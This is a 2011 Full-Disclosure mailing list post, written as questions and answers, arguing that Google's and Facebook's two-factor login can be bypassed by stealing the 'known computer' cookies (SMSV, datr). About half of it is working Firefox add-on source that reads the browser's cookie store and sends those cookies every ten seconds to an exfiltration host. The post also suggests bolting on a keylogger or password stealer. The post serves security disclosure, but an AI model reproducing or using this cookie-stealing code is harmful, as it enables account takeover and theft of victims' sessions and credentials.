Message-ID: <000001cc17ce$ee57b910$cb072b30$@net>
Date: Sat, 21 May 2011 17:51:20 +0200
From: "Z" <Z@...hall.net>
To: <full-disclosure@...ts.grok.org.uk>
Subject: (Google && Facebook) X factor authentication. Is X enough to sit back and relax?

Google and Facebook have recently added 2 factor authentication to their
services. 

Great news, so am I protected now?
There are many types of attacks and attackers. Some forms of attack are
defeated by this 2 factor authentication (shoulder surfing, hardware
keylogging, network MITM); other types of attack defeat this 2 factor
authentication protection, e.g. malware and malicious browser extensions.

Why are some attacks useless and why is malware still effective against
these 2 factor authentications?
Back to the basics: after logging in, how can the server know that you are
the authenticated user? There is only one thing that really matters: session
cookies.

I see, but who has access to my session cookies?
Every program running in the same user context on the machine. This is the
browser, browser addons, a malware running on the computer, an attacker
having an interactive shell on your computer, etc.

Is the session cookie stealable/clonable?
Yes, it is a plain text file.

Which cookies do I have to protect? 
On Facebook, the datr cookie is responsible for "skipping" the second factor
on "known" computers.
On Gmail/Google, the SMSV cookie is responsible for "skipping" the second
factor on "known" computers.
Even if the attacker is in a different country, using a different browser, it
does not matter. If the cookies are expired, first try to set the expiry
date to the future; it has not been tested whether this will work.

And what can the attacker do if he steals these cookies?
The attacker can simply insert these cookies into his browser and log in
with one factor defeated.

What if someone is so paranoid that he always uses the 2 factor auth?
The current session could still be stolen by the attacker. Otherwise one has
to infect the mobile device, clone Google Authenticator or forward the sent
SMS messages to another mobile device (for proof, search for Zitmo). Since
Google Authenticator is a soft token, it is cloneable.

Is it your idea to steal session cookies?
No, but this field is kinda under-educated/under-valued.

And how can the attacker steal the user password?
Append a keystroke logger or a postdata stealer to this POC. There are
examples here: www.jfgit.com

But I'm using Linux/UNIX/BSD/Solaris/OSX/Win7, am I still vulnerable?
Yes.

But Google and Facebook are using httponly and secure flags on the cookies.
Am I still vulnerable?
Yes.

Any recommendations?
A "Restrict session to IP" option can help if the attacker cannot
forward requests through the victim's computer. But basically, no, there is
no help.

Who are you?
Z

I don't believe this, prove it!
The Firefox POC addon will catch the Google and Facebook password and steal the
important cookies, sending the current cookie values every 10 seconds to the
attacker at 127.0.0.1.


#########################################################################################################
//Z
// Exfiltration target and beacon interval (seconds).
var host = 'http://127.0.0.1/';
var interval = 10;

var gcookie = "";
var fbcookie = "";

// nsIObserver whose observe() is invoked by the timer on every tick.
var event = {
    observe: function (subject, topic, data) {
        // Walk the whole Firefox cookie store through nsICookieManager.
        var cookieMgr = Components.classes["@mozilla.org/cookiemanager;1"]
            .getService(Components.interfaces.nsICookieManager);
        for (var e = cookieMgr.enumerator; e.hasMoreElements();) {
            var cookie = e.getNext().QueryInterface(Components.interfaces.nsICookie);

            var cookie_str = "host:" + cookie.host + " name:" + cookie.name +
                " value:" + cookie.value + " expires:" + cookie.expires +
                " path:" + cookie.path + " isSecure:" + cookie.isSecure +
                " policy:" + cookie.policy + " isDomain:" + cookie.isDomain +
                " status:" + cookie.status + "\n";

            // Only the two "known computer" cookies are kept.
            if (cookie.name == "SMSV") {
                gcookie = cookie_str;
            }
            if (cookie.name == "datr") {
                fbcookie = cookie_str;
            }
        }

        // Both cookie records go out in the query string of a GET request.
        var http = new XMLHttpRequest();
        http.open("GET", host + "?" + fbcookie + " " + gcookie, true);
        http.send();

        gcookie = "";
        fbcookie = "";
    }
};

var timer = Components.classes["@mozilla.org/timer;1"]
    .createInstance(Components.interfaces.nsITimer);
const TYPE_REPEATING_PRECISE = Components.interfaces.nsITimer.TYPE_REPEATING_PRECISE;

// Call observe() every `interval` seconds.
timer.init(event, interval * 1000, TYPE_REPEATING_PRECISE);

#########################################################################################################


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
